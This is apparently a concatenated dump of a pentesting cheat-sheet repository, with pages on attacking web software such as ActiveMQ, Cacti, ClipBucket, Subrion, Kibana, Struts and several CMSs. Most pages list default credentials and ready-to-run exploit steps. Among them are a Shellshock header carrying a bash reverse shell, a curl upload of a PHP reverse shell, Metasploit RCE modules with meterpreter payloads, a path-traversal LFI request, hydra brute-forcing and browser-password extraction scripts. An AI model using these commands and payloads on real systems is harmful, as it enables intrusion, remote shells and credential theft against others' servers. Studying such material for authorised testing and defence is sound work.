17 | ```
18 |
19 | ### Automation
20 |
21 | ```bash
22 | sqlmap -u "https://example.com/api/v1/repos/search?q=test"
23 | sqlmap -u "https://example.com/api/v1/users/search?q=test"
24 | ```
25 |
26 |
27 |
28 | ## Git Hooks Remote Code Execution (RCE)
29 |
30 | ```bash
31 | msfconsole
32 | msf> use exploit/multi/http/gogs_git_hooks_rce
33 | msf> (set options...)
34 | msf> run
35 | ```
--------------------------------------------------------------------------------
/src/exploit/web/_data.yml:
--------------------------------------------------------------------------------
1 | category1: web
2 | related_menus:
3 | - title: Method
4 | id: method
5 | - title: Security Risk
6 | id: security-risk
7 | - title: Cookie
8 | id: cookie
9 | - title: CMS
10 | id: cms
11 | - title: Framework
12 | id: framework
13 | - title: Template Engine
14 | id: template-engine
15 | - title: API
16 | id: api
17 | - title: Microsoft
18 | id: microsoft
19 | - title: Tool
20 | id: tool
21 | - title: Others
22 | id: others
--------------------------------------------------------------------------------
/src/exploit/web/apache-activemq-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Apache ActiveMQ Pentesting
3 | description: Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-23
8 | draft: false
9 | ---
10 |
11 | ## Default Credentials
12 |
13 | ```bash
14 | admin:admin
15 | ```
16 |
17 |
18 |
19 | ## Interaction with MQTT
20 |
21 | If the MQTT server is runnong on the target system, we can subscribe/publish to a topic in ActiveMQ using MQTT client.
22 |
23 | ### Subscribe to a Topic
24 |
25 | ```bash
26 | # -h: Host
27 | # -t: Topic name
28 | # -V: MQTT protocol version (5, 31, 311)
29 | mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31
30 | ```
31 |
32 |
33 |
34 | ## Web Shell by File Upload JSP
35 |
36 | ActiveMQ is vulnerable to web shell via file upload an arbitrary JSP file.
37 |
38 | ```bash
39 | msfconsole
40 | msf> use exploit/multi/http/apache_activemq_upload_jsp
41 | msf> set ...
42 | msf> run
43 | meterpreter> shell
44 | ```
45 |
--------------------------------------------------------------------------------
/src/exploit/web/api/_data.yml:
--------------------------------------------------------------------------------
1 | category2: api
--------------------------------------------------------------------------------
/src/exploit/web/atlassian-confluence-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Atlassian Confluence Pentesting
3 | description: Atlassian Confluence is a collaboration wiki tool used to help teams to collaborate and share knowledge efficiently.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2022-11-22
8 | draft: false
9 | ---
10 |
11 | ## Remote Code Execution (CVE-2022-26134)
12 |
13 | Download the exploit from the [repo](https://github.com/h3v0x/CVE-2022-26134).
14 |
15 | ```sh
16 | python3 exploit.py -u http:// -c whoami
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/src/exploit/web/bookmarklet-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Bookmarklet Attack
3 | description: If attackers can inject arbitrary JavaScript code in target website, they can induce victims to malicious executions with bookmarklet.
4 | tags:
5 | - Web
6 | refs:
7 | - https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/
8 | date: 2023-06-19
9 | draft: false
10 | ---
11 |
12 | ## Exploitation
13 |
14 | ### Malicious Links
15 |
16 | Attackers induce victims to add their malicious link into the bookmark menu as below.
17 |
18 | ```html
19 |
Drag and drop the following link into the bookmark menu to access easily!
20 | Example.com
21 | ```
22 |
23 | In addition, if the current website does not set **`HttpOnly`** flag on the **`Set-Cookie`** response header, attackers can get the victim's cookie and send it to the malicious website as below.
24 |
25 | ```html
26 |
Drag and drop me the following link into the bookmark menu to access easily!
27 | Example.com
28 | ```
29 |
--------------------------------------------------------------------------------
/src/exploit/web/browser-in-the-browser-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Browser in the Browser (BITB) Attack
3 | description:
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-02
8 | draft: false
9 | ---
10 |
11 | ## Use Templates
12 |
13 | [This repository](https://github.com/mrd0x/BITB) is useful for attacking.
--------------------------------------------------------------------------------
/src/exploit/web/cacti-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Cacti Pentesting
3 | description: Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application.
4 | tags:
5 | - Web
6 | refs:
7 | - https://pentest-tools.com/vulnerabilities-exploits/cacti-remote-code-execution_CVE-2022-46169
8 | date: 2023-05-02
9 | draft: false
10 | ---
11 |
12 | ## Default Credentials
13 |
14 | ```bash
15 | admin:admin
16 | ```
17 |
18 |
19 |
20 | ## Common Directories
21 |
22 | ```bash
23 | /include/config.php
24 | ```
25 |
26 |
27 |
28 | ## Remote Code Execution (RCE) CVE-2022-46169
29 |
30 | Reference: [https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/](https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/)
31 |
32 | ```bash
33 | msfconsole
34 | msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection
35 | msf> (set options...)
36 | msf> run
37 | ```
38 |
39 | Also we can refer to [Exploit DB](https://www.exploit-db.com/exploits/51166).
--------------------------------------------------------------------------------
/src/exploit/web/cgi-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: CGI Pentesting
3 | description: CGI (Common Gateway Interface) is a standard protocol that enables web servers to interact with external programs, typically to generate dynamic web content or handle web form submissions. If there is /cgi-bin/ directory in the website, we may be able to execute arbitrary OS command.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Enumeration CGI Scripts
12 |
13 | ```bash
14 | ffuf -u https://example.com/cgi-bin/FUZZ.cgi -w wordlist.txt
15 | ```
16 |
17 |
18 |
19 | ## Shellshock
20 |
21 | Shellshock is the vulnerability of bash v1.0.3-4.3 that allows users to execute arbitrary commands.
22 | If we found the CGI script under **`/cgi-bin/`**, modifying HTTP header to remote code execution.
23 |
24 | ```bash
25 | GET /cgi-bin/example.cgi HTTP/1.1
26 |
27 | User-Agent: () { :; }; /bin/bash -c "sleep 5"
28 | Cookie: () { :; }; /bin/bash -c "sleep 5"
29 |
30 | # Reverse Shell
31 | User-Agent: () { :; }; /bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
32 | ```
--------------------------------------------------------------------------------
/src/exploit/web/clipbucket-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ClipBucket Pentesting
3 | description: ClipBucket is a freely downloadable PHP script that will let you start your own Video Sharing website (YouTube Clone).
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-19
8 | draft: false
9 | ---
10 |
11 | ## Arbitrary File Upload < v4.0.0
12 |
13 | ClipBucket versions before 4.0.0 is vulnerable to file upload in ‘uploader’ actions. We can upload arbitrary files so we can execute reverse shell.
14 |
15 | ### 1. Prepare Payload
16 |
17 | Create a PHP script to reverse shell in local machine.
18 |
19 | ```bash
20 | cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
21 | ```
22 |
23 | Update $ip and $port with your local ip address and port.
24 |
25 | ### 2. Upload the Payload
26 |
27 | Next upload the above PHP script to the target website.
28 |
29 | ```bash
30 | curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "https://example.com/actions/beats_uploader.php"
31 | ```
32 |
33 | ### 3. Reverse Shell
34 |
35 | In local machine, start a listener.
36 |
37 | ```bash
38 | nc -lvnp 4444
39 | ```
40 |
41 | Then access to **`https://example.com/actions/CB_BEATS_UPLOAD_DIR/.php`**.
42 | We should get a shell.
--------------------------------------------------------------------------------
/src/exploit/web/cms/_data.yml:
--------------------------------------------------------------------------------
1 | category2: cms
--------------------------------------------------------------------------------
/src/exploit/web/cms/bolt-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Bolt CMS Pentesting
3 | description: Bolt is an open-source content managemtn system based on PHP.
4 | tags:
5 | - CMS
6 | - Web
7 | refs:
8 | date: 2022-11-22
9 | draft: false
10 | ---
11 |
12 | ## Login Page
13 |
14 | ```sh
15 | /bolt
16 | ```
17 |
18 |
19 |
20 | ## Remote Code Execution (v3.7.1)
21 |
22 | ```sh
23 | msfconsole
24 | msf> use exploit/unix/webapp/bolt_authenticated_rce
25 | msf> set lhost
26 | msf> set rhosts
27 | msf> set username
28 | msf> set password
29 | msf> run
30 | ```
31 |
--------------------------------------------------------------------------------
/src/exploit/web/cms/cockpit-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Cockpit CMS Pentesting
3 | description: Cockpit CMS is a content management system for publishing contents.
4 | tags:
5 | - CMS
6 | - Web
7 | refs:
8 | date: 2023-02-05
9 | draft: false
10 | ---
11 |
12 | ## Enumeration & Remote Code Execution (RCE) & Reverse Shell
13 |
14 | ```bash
15 | # Reset password (CVE-2020-35847)
16 | msf> use exploit/multi/cockpit_cms_rce
17 | msf> set USER admin
18 | msf> run
19 | ```
20 |
21 |
22 |
23 | ## Version Detection
24 |
25 | Cockpit CMS version is displayed as the value of “data-version” attribute in html tag.
26 |
27 | ```bash
28 |
29 | ```
30 |
31 |
32 |
33 | ## Common Directories
34 |
35 | ```bash
36 | /auth/check # We can enumerate users using the path
37 | /auth/forgotpassword
38 | /auth/index
39 | /auth/login
40 | /auth/requestreset # We can enumerate users using the path
41 | ```
--------------------------------------------------------------------------------
/src/exploit/web/cms/concrete-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Concrete CMS Pentesting
3 | description: Concrete CMS is a content management system for publishing contents.
4 | tags:
5 | - CMS
6 | - Web
7 | refs:
8 | date: 2023-02-05
9 | draft: false
10 | ---
11 |
12 | ## Default Credentials
13 |
14 | The default username is **“admin”** in Concrete5.
--------------------------------------------------------------------------------
/src/exploit/web/cms/fuel-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: FUEL CMS Pentesting
3 | description: FUEL is a content management system (CMS).
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-20
8 | draft: false
9 | ---
10 |
11 | ## Default Credential
12 |
13 | ```txt
14 | admin:admin
15 | ```
16 |
--------------------------------------------------------------------------------
/src/exploit/web/cms/index.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: CMS (Content Management System) Pentesting
3 | description: CMS (Content Management System) is computer software used to manage the creation and modification of digital content.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-20
8 | draft: false
9 | ---
10 |
11 | ## CMS Detection
12 |
13 | If you don't know which CMS used in target websites, you can detect it using **[Cmseek](https://github.com/Tuhinshubhra/CMSeeK)** which is an automatic CMS detection tool.
14 |
15 | ```sh
16 | cmseek -u vulnerable.com
17 | ```
18 |
--------------------------------------------------------------------------------
/src/exploit/web/cms/mara-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Mara CMS Pentesting
3 | description: Mara CMS is a file based content management system.
4 | tags:
5 | - CMS
6 | - Web
7 | refs:
8 | - https://www.exploit-db.com/exploits/48780
9 | date: 2023-03-07
10 | draft: false
11 | ---
12 |
13 | ## Default Credentials
14 |
15 | ```bash
16 | admin:changeme
17 | ```
18 |
19 |
20 |
21 | ## Remote Code Execution (RCE) v7.5
22 |
23 | Reference: [https://www.exploit-db.com/exploits/48780](https://www.exploit-db.com/exploits/48780)
24 |
25 | ### Automation
26 |
27 | ```bash
28 | msfconsole
29 | msf> use exploit/multi/http/maracms_upload_exec
30 | msf> set rhosts
31 | msf> set lhost
32 | msf> set srvhost
33 | msf> set srvport
34 | msf> set targeturi /path/to/maracms/
35 | msf> set targeturipath /path/to/maracms/
36 | ```
37 |
--------------------------------------------------------------------------------
/src/exploit/web/cms/subrion-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Subrion CMS Pentesting
3 | description: Subrion is a content management system (CMS).
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-20
8 | draft: false
9 | ---
10 |
11 | ## File Upload to Reverse Shell (Credential Required)
12 |
13 | ### 1. Download Reverse Shell Payload
14 |
15 | Get the PHP payload from [php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell). And change the file extension to **'.phar'**.
16 | Then start a listener.
17 |
18 | ```sh
19 | nc -lvnp 4444
20 | ```
21 |
22 | ### 2. Upload the Payload in Subrion Panel
23 |
24 | 1. **Login**
25 |
26 | 2. **Move to Content -> Uploads in Panel**
27 |
28 | 3. **Upload reverse-shell.phar**
29 |
30 | 4. **Access to /subrion/upload/reverse-shell.phar**
31 |
32 | Now you get a shell.
--------------------------------------------------------------------------------
/src/exploit/web/code-deobfuscation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Code Deobfuscation
3 | description: This technique make a obfuscated code (such as JavaScript) to be understandable.
4 | tags:
5 | - Web
6 | draft: false
7 | ---
8 |
9 | ## Deobfuscation
10 |
11 | - **JavaScript**
12 |
13 | - **[JavaScript Deobfuscator](https://deobfuscate.io/)**
14 |
15 |
16 |
17 | ## Obfuscation
18 |
19 | 1. **JavaScript**
20 |
21 | - **Manual Obfuscation**
22 |
23 | 1. Access [https://obfuscator.io/](https://obfuscator.io/).
24 |
25 | 2. Change “String Array Encoding” to “Base64”.
26 |
27 | 3. Paste JavaScript code.
28 |
29 | 4. Click "Obfuscate".
30 |
31 | 5. Try running it on [https://jsconsole.com/](https://jsconsole.com/).
32 |
33 | - **Use Online Tools**
34 |
35 | - **[JSFuck](http://www.jsfuck.com/)**
36 |
37 | - **[jjencode](https://utf-8.jp/public/jjencode.html)**
38 |
39 | - **[aaencode](https://utf-8.jp/public/aaencode.html)**
40 |
--------------------------------------------------------------------------------
/src/exploit/web/codiad-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Codiad Pentesting
3 | description: Codiad is a web-based IDE framework.
4 | tags:
5 | - Web
6 | refs:
7 | - https://www.exploit-db.com/exploits/49705
8 | date: 2023-02-26
9 | draft: false
10 | ---
11 |
12 | ## Default Credentials
13 |
14 | ```sh
15 | # Docker image - https://hub.docker.com/r/bitnami/codiad
16 | user:bitnami
17 | ```
18 |
19 |
20 |
21 | ## Enumeration
22 |
23 | ```bash
24 | # Get current directory in the system
25 | /components/project/controller.php?action=get_current
26 | ```
27 |
28 |
29 |
30 | ## Remote Code Execution (RCE) v2.8.4
31 |
32 | ```bash
33 | wget https://www.exploit-db.com/exploits/49705 -O exploit.py
34 |
35 | # Linux
36 | python3 exploit.py https://example.com/ admin admin 4444 linux
37 | # Windows
38 | python3 exploit.py https://example.com/ admin admin 4444 windows
39 | ```
40 |
--------------------------------------------------------------------------------
/src/exploit/web/cookie/_data.yml:
--------------------------------------------------------------------------------
1 | category2: cookie
--------------------------------------------------------------------------------
/src/exploit/web/cookie/session-fixation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Session Fixation
3 | description: Session fixation attacks attempt to exploit the vulnerability of a system that allows one person to fixate another person’s session identifier.
4 | tags:
5 | - Cookie
6 | - Web
7 | refs:
8 | - https://owasp.org/www-community/attacks/Session_fixation
9 | date: 2023-04-15
10 | draft: false
11 | ---
12 |
13 | ## Exploitation
14 |
15 | ### 1. Attacker Logins Website to Get the Session
16 |
17 | An attacker need to login to a legitimate website then get the session value.
18 |
19 | ```bash
20 | Cookie: sessid=abcdef
21 | ```
22 |
23 | ### 2. Attacker Sends the Session Value to Victim
24 |
25 | There are various way to send the attacker’s session value. For example,
26 |
27 | - Send email.
28 | - Predict a session value.
29 | - Eavesdrop a session using packet sniffer such as Wireshark.
30 | - XSS
31 |
32 | ```bash
33 |
34 | ```
35 |
36 | ### 3. Victim Logins with Attacker’s Session
37 |
38 | If the victim logins and attacker’s session is set to the Cookie, the attacker can control the victim’s account in the website.
--------------------------------------------------------------------------------
/src/exploit/web/elasticsearch/_data.yml:
--------------------------------------------------------------------------------
1 | category2: elasticsearch
--------------------------------------------------------------------------------
/src/exploit/web/elasticsearch/elasticsearch-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Elasticsearch Pentesting
3 | description: It is a search engine based on the Lucene library. Default ports are 9200, 9300.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-12-23
8 | draft: false
9 | ---
10 |
11 | ## Default Credentials
12 |
13 | ```txt
14 | admin:elasticadmin
15 | elastic:changeme
16 | ```
17 |
18 |
19 |
20 | ## Brute Force Credentials
21 |
22 | Crack the "Authorization" header in the web page.
23 |
24 | ```sh
25 | hydra -L usernames.txt -P passwords.txt -s 9200 http-get /
26 | ```
27 |
28 |
29 |
30 | ## Common Directories
31 |
32 | ```bash
33 | /_cat/
34 | /_cat/indices
35 | /_cluster/
36 | /_nodes/
37 | /_remote/
38 | /_security
39 | /_search?q=username
40 | /_search?q=password
41 | /_security/role
42 | /_security/user
43 | /_xpack/security/user/
44 | ```
45 |
--------------------------------------------------------------------------------
/src/exploit/web/elasticsearch/kibana-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Kibana Pentesting
3 | description: A proprietary data visualization dashboard software for Elasticsearch. A default port is 5601.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2022-12-22
8 | draft: false
9 | ---
10 |
11 | ## Vulnerabilities
12 |
13 | ### Local File Inclusion (LFI) Version \< 6.4.3 & 5.6.13
14 |
15 | ```sh
16 | curl http://:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt
17 | ```
18 |
19 | ### Remote Code Execution (RCE) Version \< 6.6.0
20 |
21 | Reference: [https://github.com/mpgn/CVE-2019-7609](https://github.com/mpgn/CVE-2019-7609)
22 |
--------------------------------------------------------------------------------
/src/exploit/web/extract-web-browser-passwords.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Extract Web Browser Passwords
3 | description: Browser’s passwords may be retrieve easily if our device is compromised by decrypting login data.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-06-23
8 | draft: false
9 | ---
10 |
11 | ## Firefox
12 |
13 | ```bash
14 | wget https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py
15 | python3 firefox_decrypt.py
16 | ```
17 |
18 |
19 |
20 | ## Google Chrome
21 |
22 | ```bash
23 | wget https://raw.githubusercontent.com/ohyicong/decrypt-chrome-passwords/main/decrypt_chrome_password.py
24 | python3 decrypt_chrome_password.py
25 | ```
26 |
--------------------------------------------------------------------------------
/src/exploit/web/framework/_data.yml:
--------------------------------------------------------------------------------
1 | category2: framework
--------------------------------------------------------------------------------
/src/exploit/web/framework/dotnet/_data.yml:
--------------------------------------------------------------------------------
1 | category3: dotnet
--------------------------------------------------------------------------------
/src/exploit/web/framework/dotnet/blazor-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Blazor Pentesting
3 | description: Blazor is a web framework for building interactive web applications using C# instead of JavaScript.
4 | tags:
5 | - .NET
6 | - Web
7 | refs:
8 | date: 2024-11-30
9 | draft: false
10 | ---
11 |
12 | ## Common Directories/Files
13 |
14 | ```bash
15 | # This file contains paths of DLLs that can be reversed.
16 | /_framework/blazor.boot.json
17 | /_framework/.dll
18 | ```
19 |
20 |
21 |
22 | ## Reverse Engineering DLLs
23 |
24 | We can reverse DLLs such as `/_framework/.dll` using tools such as **DotPeek** for retrieving sensitive information (credentials, software versions, etc.).
25 |
26 | If you use DotPeek, right-click on the name in Assembly Explorer and click **Decompiled Sources** for investigation.
--------------------------------------------------------------------------------
/src/exploit/web/framework/java/_data.yml:
--------------------------------------------------------------------------------
1 | category3: java
--------------------------------------------------------------------------------
/src/exploit/web/framework/java/ajp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: AJP (Apache JServ Protocol) Pentesting
3 | description: AJP is a binary protocol that can proxy inbound requests from a web server through to an application server that sits behind the web server. A default port is 8009.
4 | tags:
5 | - AJP
6 | - Web
7 | refs:
8 | date: 2022-11-22
9 | draft: false
10 | ---
11 |
12 | ## Enumeration
13 |
14 | ```sh
15 | nmap --script ajp-auth -p 8009
16 | nmap --script ajp-auth --script-args ajp-auth.path=/login -p 8009
17 | nmap --script ajp-brute -p 8009
18 | nmap --script ajp-headers -p 8009
19 | nmap --script ajp-methods -p 8009
20 | nmap --script ajp-request -p 8009
21 | ```
22 |
23 |
24 |
25 | ## Ghostcat File Inclusion
26 |
27 | It's a vulnerability of **Tomcat AJP** ([CVE-2020-1938](https://www.exploit-db.com/exploits/49039)).
28 | Use Metasploit for exploiting it.
29 |
30 | ```sh
31 | msfconsole
32 | msf6 > use auxiliary/admin/http/tomcat_ghostcat
33 | msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts
34 | msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit
35 | ```
36 |
--------------------------------------------------------------------------------
/src/exploit/web/framework/java/apache-struts-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Apache Struts Pentesting
3 | description: An open-source web application framework for developing Java EE web applications.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2022-11-22
8 | draft: false
9 | ---
10 |
11 | ## Struts2 OGNL Elavasion
12 |
13 | Metasploit is useful for exploiting.
14 |
15 | ```sh
16 | msfconsole
17 | msf > use multi/http/struts2_content_type_ognl
18 | msf > set payload linux/x86/meterpreter/reverse_tcp
19 | msf > exploit
20 |
21 | meterpreter > shell
22 | SHELL=/bin/bash script -q /dev/null
23 | ```
--------------------------------------------------------------------------------
/src/exploit/web/framework/javascript/_data.yml:
--------------------------------------------------------------------------------
1 | category3: javascript
--------------------------------------------------------------------------------
/src/exploit/web/framework/javascript/angular-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Angular Pentesting
3 | description: AngularJS is a web application framework.
4 | tags:
5 | - SSTI
6 | - Web
7 | refs:
8 | date: 2023-07-12
9 | draft: false
10 | ---
11 |
12 | ## HTML Attributes
13 |
14 | If a website uses AngularJS framework, the nodes have a “ng-apps” attribute. So you can check it in a HTML source code.
15 |
16 | ```html
17 |
22 |
23 | ## Bypass ALLOWED_HOSTS
24 |
25 | If we get the error **“Invalid HTTP_HOST header: 'x.x.x.x:8000'. You may need to add 'x.x.x.x' to ALLOWED_HOSTS"** when accessing the website written in Django, you need to intercept the value of the Host in the HTTP request header.
26 | Then you should be able to access the website.
27 |
28 | ```bash
29 | Host: 0.0.0.0:8000
30 | # or
31 | Host: 127.0.0.1:8000
32 | ```
33 |
34 | Or if we can have the permission to edit the configuration of the website, add new IP address to **ALLOWED_HOSTS** in **`settings.py`**.
35 |
36 | ```bash
37 | ALLOWED_HOSTS = ['0.0.0.0', '127.0.0.1', 'x.x.x.x']
38 | ```
39 |
40 |